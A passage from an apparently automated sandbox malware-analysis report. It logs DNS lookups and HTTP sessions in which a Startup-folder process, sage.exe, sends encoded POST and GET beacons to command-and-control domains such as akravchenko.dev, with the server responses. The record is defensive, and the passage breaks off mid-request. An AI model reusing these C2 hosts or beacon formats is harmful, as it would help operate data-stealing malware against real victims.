                                                                                                                                              Nov 28, 2024 18:58:17.649842024 CET1.1.1.1192.168.11.200xf8fNo error (0)www.affilamark.buzz161.97.168.245A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:58:32.022288084 CET1.1.1.1192.168.11.200xecd9No error (0)www.shedoes.top162.0.239.141A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:04.525433064 CET1.1.1.1192.168.11.200xd36bName error (3)www.torkstallningar.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:17.410501003 CET1.1.1.1192.168.11.200x1763Server failure (2)www.aflaksokna.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:17.410537958 CET1.1.1.1192.168.11.200x1763Server failure (2)www.aflaksokna.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:17.410562992 CET1.1.1.1192.168.11.200x1763Server failure (2)www.aflaksokna.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:18.471460104 CET9.9.9.9192.168.11.200x1763Server failure (2)www.aflaksokna.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:18.590301037 CET1.1.1.1192.168.11.200x4f64Server failure (2)www.aflaksokna.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:18.754657030 CET9.9.9.9192.168.11.200x4f64Server failure (2)www.aflaksokna.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:19.632174969 CET9.9.9.9192.168.11.200x1763Server failure (2)www.aflaksokna.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:26.002559900 CET1.1.1.1192.168.11.200xbcd3No error (0)www.claudpinheiro.onlineclaudpinheiro.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:26.002559900 CET1.1.1.1192.168.11.200xbcd3No error (0)claudpinheiro.online84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:40.965419054 CET1.1.1.1192.168.11.200xac55No error (0)www.slwmarketing.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:56.440644026 CET1.1.1.1192.168.11.200xbee3No error (0)www.56435.net172.247.159.68A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:01:11.390691996 CET1.1.1.1192.168.11.200x6e28No error (0)www.tekilla.wtfredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:01:11.390691996 CET1.1.1.1192.168.11.200x6e28No error (0)redirect.3dns.box172.172.168.240A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:01:25.311614037 CET1.1.1.1192.168.11.200x8347No error (0)www.tyai36.toptyai36.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:01:25.311614037 CET1.1.1.1192.168.11.200x8347No error (0)tyai36.top38.47.207.120A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:01:39.822860956 CET1.1.1.1192.168.11.200x8ff5No error (0)www.homebizsuccess.bloghomebizsuccess.blogCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:01:39.822860956 CET1.1.1.1192.168.11.200x8ff5No error (0)homebizsuccess.blog192.185.16.209A (IP address)IN (0x0001)false

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • www.1win-moldovia.fun
                                                                                                                                              • www.akravchenko.dev
                                                                                                                                              • www.hubeisuizhou.net
                                                                                                                                              • www.bashei.top

                                                                                                                                              HTTP Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.11.2049715172.67.149.53804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:56:49.036932945 CET399OUTGET /rfr1/?YDrhw=DvQP9LC050182Z3&VX=F4hOgqu9W5FpVGQoAREgTite/5iXCZQ+jfwfTHlgxAY2vkqeiMz3vCoerVdgDkzWxU8N3qFnpYIa4u2RgKwz4Zn2GG0gDMAqCr9egx1VT+K5Ui7eAt5njHk= HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.1win-moldovia.fun
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Nov 28, 2024 18:56:51.298477888 CET968INHTTP/1.1 523
                                                                                                                                              Date: Thu, 28 Nov 2024 17:56:51 GMT
                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                              Content-Length: 15
                                                                                                                                              Connection: close
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBH4hs7cb6Yx3zyLcYuW8nw8ouuiDwAU1qgf2FioVC01wXEz6%2Bd4%2BN9gu%2B8Hky451ayW067hYDpWGkx7FKsc4gSaBZAgiRn3ZtE3dTeu2UbcIsRmRZFvQp33niAaB77XgEDWF3vU0Hc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8e9c3c9ef9c20ad3-LAS
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=156398&min_rtt=156398&rtt_var=78199&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 33
                                                                                                                                              Data Ascii: error code: 523


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.11.2049716217.70.184.50804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:07.324217081 CET657OUTPOST /l1qb/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.akravchenko.dev
                                                                                                                                              Origin: http://www.akravchenko.dev
                                                                                                                                              Referer: http://www.akravchenko.dev/l1qb/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 199
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 69 6b 47 41 31 6a 4b 4c 4b 6f 73 5a 6d 47 6e 74 4e 4c 67 66 61 62 76 53 57 31 6e 4b 64 38 58 4d 61 63 74 2f 65 35 57 6a 43 5a 2b 47 6f 58 77 66 57 53 45 2f 45 70 53 7a 78 75 6f 36 5a 6a 65 69 79 35 59 47 59 56 42 77 50 36 77 73 43 4f 47 32 73 76 30 63 52 43 66 71 4c 52 65 79 74 69 71 37 6c 6c 50 78 4b 57 65 2b 35 36 4c 48 34 65 47 4a 2b 36 79 6b 37 52 67 4e 42 76 63 58 67 59 66 67 2f 4e 74 79 74 6d 37 4a 6c 65 43 6d 56 7a 6d 48 47 45 4d 33 75 44 47 62 37 73 65 57 69 32 72 6a 79 43 32 38 6f 2f 2f 49 39 31 42 67 46 2f 6f 35 38 51 63 2b 67 3d 3d
                                                                                                                                              Data Ascii: VX=u8bQrE+on1LVrikGA1jKLKosZmGntNLgfabvSW1nKd8XMact/e5WjCZ+GoXwfWSE/EpSzxuo6Zjeiy5YGYVBwP6wsCOG2sv0cRCfqLReytiq7llPxKWe+56LH4eGJ+6yk7RgNBvcXgYfg/Ntytm7JleCmVzmHGEM3uDGb7seWi2rjyC28o//I91BgF/o58Qc+g==
                                                                                                                                              Nov 28, 2024 18:57:07.627374887 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:07 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              2192.168.11.2049717217.70.184.50804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:10.159029961 CET677OUTPOST /l1qb/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.akravchenko.dev
                                                                                                                                              Origin: http://www.akravchenko.dev
                                                                                                                                              Referer: http://www.akravchenko.dev/l1qb/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 219
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 48 73 47 48 57 4c 4b 4e 71 6f 76 57 47 47 6e 6d 74 4c 6b 66 61 58 76 53 56 35 33 4c 76 49 58 4d 37 41 74 2b 63 42 57 67 43 5a 2b 4f 49 58 78 41 6d 53 54 2f 45 31 67 7a 30 57 6f 36 5a 66 65 69 33 46 59 47 70 56 47 71 2f 36 79 6a 69 50 41 37 4d 76 30 63 52 43 66 71 4c 46 6b 79 73 4b 71 36 52 5a 50 77 70 4f 64 7a 5a 37 35 58 59 65 47 65 4f 36 4d 6b 37 51 46 4e 44 61 33 58 69 67 66 67 2b 39 74 6a 59 4b 34 41 6c 65 41 72 31 7a 31 4a 45 41 43 37 2b 72 35 54 62 6f 47 61 69 47 67 6d 6b 54 73 68 61 4c 62 4c 75 70 7a 6b 31 47 41 37 2b 52 48 6a 6c 66 6e 55 66 46 4e 4c 78 41 30 4a 48 6d 6d 6b 65 46 76 75 47 77 3d
                                                                                                                                              Data Ascii: VX=u8bQrE+on1LVrHsGHWLKNqovWGGnmtLkfaXvSV53LvIXM7At+cBWgCZ+OIXxAmST/E1gz0Wo6Zfei3FYGpVGq/6yjiPA7Mv0cRCfqLFkysKq6RZPwpOdzZ75XYeGeO6Mk7QFNDa3Xigfg+9tjYK4AleAr1z1JEAC7+r5TboGaiGgmkTshaLbLupzk1GA7+RHjlfnUfFNLxA0JHmmkeFvuGw=
                                                                                                                                              Nov 28, 2024 18:57:10.461786032 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:10 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              3192.168.11.2049718217.70.184.50804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:13.002302885 CET2578OUTPOST /l1qb/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.akravchenko.dev
                                                                                                                                              Origin: http://www.akravchenko.dev
                                                                                                                                              Referer: http://www.akravchenko.dev/l1qb/
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 48 73 47 48 57 4c 4b 4e 71 6f 76 57 47 47 6e 6d 74 4c 6b 66 61 58 76 53 56 35 33 4c 76 51 58 4c 4a 6b 74 2f 37 56 57 68 43 5a 2b 50 49 58 30 41 6d 53 53 2f 45 74 6b 7a 31 71 65 36 63 54 65 7a 68 78 59 41 62 39 47 2f 76 36 79 37 69 4f 48 32 73 76 39 63 52 79 54 71 4c 56 6b 79 73 4b 71 36 58 39 50 33 36 57 64 78 5a 36 4c 48 34 65 43 4a 2b 37 68 6b 34 67 2f 4e 44 66 4d 58 53 41 66 68 65 74 74 68 4b 53 34 50 6c 65 47 75 31 79 6f 4a 46 39 41 37 2b 6e 54 54 62 63 34 61 68 6d 67 71 56 36 56 6b 35 6e 2f 64 4f 31 4d 76 32 4f 4c 36 49 35 32 75 53 66 46 45 73 64 77 56 6c 41 78 50 6b 6d 74 6e 39 45 31 2f 54 54 70 41 4a 61 53 38 4e 37 6d 31 4e 34 6b 4e 6a 71 33 41 66 78 6a 48 35 6e 72 39 39 6c 53 75 30 64 4d 4c 61 54 78 4e 4a 46 36 4b 43 77 51 37 6b 49 31 6b 48 76 50 74 67 32 68 46 43 51 63 49 41 65 49 77 64 73 36 43 64 77 6f 55 6c 4b 31 38 6c 46 4a 59 66 31 35 77 46 4e 54 56 50 39 36 64 4c 51 62 76 37 55 51 5a 6e 2b 48 68 49 45 32 68 35 55 50 54 2f 63 69 50 71 73 [TRUNCATED]
                                                                                                                                              Data Ascii: VX=u8bQrE+on1LVrHsGHWLKNqovWGGnmtLkfaXvSV53LvQXLJkt/7VWhCZ+PIX0AmSS/Etkz1qe6cTezhxYAb9G/v6y7iOH2sv9cRyTqLVkysKq6X9P36WdxZ6LH4eCJ+7hk4g/NDfMXSAfhetthKS4PleGu1yoJF9A7+nTTbc4ahmgqV6Vk5n/dO1Mv2OL6I52uSfFEsdwVlAxPkmtn9E1/TTpAJaS8N7m1N4kNjq3AfxjH5nr99lSu0dMLaTxNJF6KCwQ7kI1kHvPtg2hFCQcIAeIwds6CdwoUlK18lFJYf15wFNTVP96dLQbv7UQZn+HhIE2h5UPT/ciPqsUapPcK0/dgs34Xsh8dJi4D1ASxbqC2BVl0ZBui0kyjAQJcbQKDMW7fgYuAQ7fZfKMJO+qHJDxKwSo1gqn9IygNhcrNjn9yizqH1D6BfIkmySYWSwaWEK+pjF2H4uBphQbE6t6r+ypyBKoVSjCulhl7VeREoBS4u0q5U13RytUFz1WjBKDqtLiG81KYlCJUgmmBzXvfuoBZ2wDe8HCX5Bq4BkMJkGD4xaUK8JQGSZXym3Dn4Xy1Cfa3Db1pc84vPC+1yss6gufTJxiWR2fF/5c74SKrcPegw4y1gKyDq8rbW/tI4Di/VJAgDmEPii8NqHI2IC3Ag0wrMzvIDrZ4Otx8q+jdxURJ72kBUeTohTDtW7ibIIDKZDXRbmqID6QnzFG/kWWcvz2xoCRv6XUH3G4r/psoBAgvdcqubTsxCHTgla5fu0q2X/jgA8fyIYh/axN320FwUoEe4WPS7PVW5aOgO1rpo9KWFX7zk8Ey0Kh9AHYhj164CwTtbqWVUUzL7KfBhkr78CQqfV+NlxdpIzkTID8WwqECm563bcWGLMmf/LfrWQ0iPVquv2qT8aM3qXAdgdttayHIWNYl6a37jFuOC65QycuG54IXUymoGgjyS67MtmY5PwoWPLNrNeJ7ntLYqaSaHVS8vdQnJIM0tBtcOl9DxG+YN75J [TRUNCATED]
                                                                                                                                              Nov 28, 2024 18:57:13.002372980 CET5248OUTData Raw: 4d 4b 52 4f 67 7a 59 7a 6d 52 66 4c 70 36 72 53 43 36 68 37 55 76 4a 74 48 6e 71 77 57 49 43 62 41 53 37 75 4e 2b 4e 31 4c 49 7a 30 6b 42 43 4c 51 52 47 4e 4d 36 39 51 61 46 4a 59 56 72 55 56 7a 72 38 38 44 33 71 2b 4b 62 72 7a 5a 7a 73 73 4e 4c
                                                                                                                                              Data Ascii: MKROgzYzmRfLp6rSC6h7UvJtHnqwWICbAS7uN+N1LIz0kBCLQRGNM69QaFJYVrUVzr88D3q+KbrzZzssNLj0ZZQIUkpDNhStrK0Uq2OrFS9hF2R+ZFk5Vw0R+1PAYmMLcRePZ25sACdcKrHG22/6t2cfZGzVnYm+g8OYwrT0tS7KGAnBdVnm4B623RTL0v6911YpZB7aYHVDCf9sljVXrLEnXnIL5Bj48W7GtQ0ObY7XBqE7Ik6
                                                                                                                                              Nov 28, 2024 18:57:13.332902908 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:13 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              4192.168.11.2049719217.70.184.50804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:15.842971087 CET397OUTGET /l1qb/?VX=j+zwo0WruX31giYaAXLqFZsOSDWIhP7jTa/dbVxGHcBqV/4l3NxJtgpmZpbROnG1sUhGxH62sOLj7xpOC5An+cKklQHM9vXGdSm+p7Uk9aee91hqvbKIz6k=&YDrhw=DvQP9LC050182Z3 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.akravchenko.dev
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Nov 28, 2024 18:57:16.147953987 CET1289INHTTP/1.1 200 OK
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:16 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Content-Security-Policy: default-src 'self'; script-src 'nonce-018399ea1d4246858087221f0beb7bda';
                                                                                                                                              Vary: Accept-Language
                                                                                                                                              Data Raw: 39 32 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 30 31 38 33 39 39 65 61 31 64 34 32 34 36 38 35 38 30 38 37 32 32 31 66 30 62 65 62 37 62 64 61 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                                                                              Data Ascii: 92e<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-018399ea1d4246858087221f0beb7bda';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>akravchenko.dev</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic
                                                                                                                                              Nov 28, 2024 18:57:16.148065090 CET1289INData Raw: 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 3c 2f 68 31 3e 3c 64 69 76 20 63 6c
                                                                                                                                              Data Ascii: _2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=akravchenko.dev"><strong>View the WHOIS results of
                                                                                                                                              Nov 28, 2024 18:57:16.148081064 CET67INData Raw: 6b 6f 2e 64 65 76 27 29 3b 0a 20 20 20 20 7d 29 3b 0a 20 20 7d 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 3c 2f 6d 61 69 6e 3e 3c 2f 64 69 76 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                              Data Ascii: ko.dev'); }); });</script></main></div> </body></html>
                                                                                                                                              Nov 28, 2024 18:57:16.148092985 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              5192.168.11.204972043.153.84.190804568C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 18:57:21.882464886 CET660OUTPOST /jywy/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
